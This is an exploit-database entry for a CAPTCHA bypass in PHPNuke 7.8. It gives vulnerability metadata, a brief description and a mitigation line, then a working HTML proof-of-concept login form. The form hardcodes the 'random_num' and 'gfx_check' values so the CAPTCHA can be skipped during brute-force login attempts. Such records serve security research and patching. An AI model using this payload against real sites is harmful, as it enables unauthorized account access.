PHPNuke CAPTHCA Bypass

vendor:

PHPNuke

by:

SecurityFocus

7.5

CVSS

HIGH

Bypass Authentication

287

CWE

Product Name: PHPNuke

Affected Version From: PHPNuke 7.8

Affected Version To: PHPNuke 7.8

Patch Exists: NO

Related CWE: N/A

CPE: a:phpnuke:phpnuke

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

The CAPTCHA implementation of PHPNuke may be bypassed by remote attackers due to a design error. This may be used to carry out other attacks such as brute-force attempts against the login page. An attacker can bypass the CAPTCHA by setting the 'random_num' and 'gfx_check' parameters to predetermined values.

Mitigation:

Ensure that the CAPTCHA implementation is secure and cannot be bypassed.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16722/info

The CAPTCHA implementation of PHPNuke may be bypassed by remote attackers due to a design error.


This may be used to carry out other attacks such as brute-force attempts against the login page.

[------ real life exploit ------]

<html>
<head>
<title>phpNuke CAPTHCA bypass POC</title>
</head>
<body>
<center>
<br><br><br><br>

<form action="http://localhost/nuke78/modules.php?name=Your_Account" method="post">

Username: <input type="text" name="username" size="15" maxlength="25"><br>
Password: <input type="password" name="user_password" size="15" maxlength="20"><br>

<input type="hidden" name="random_num" value="112652">
<input type="hidden" name="gfx_check" value="304380">

<input type="hidden" name="op" value="login">
<input type="submit" value="Login">

</form>
<br><br><br><br>
</center>
</body>
</html>

[----- /real life exploit ------]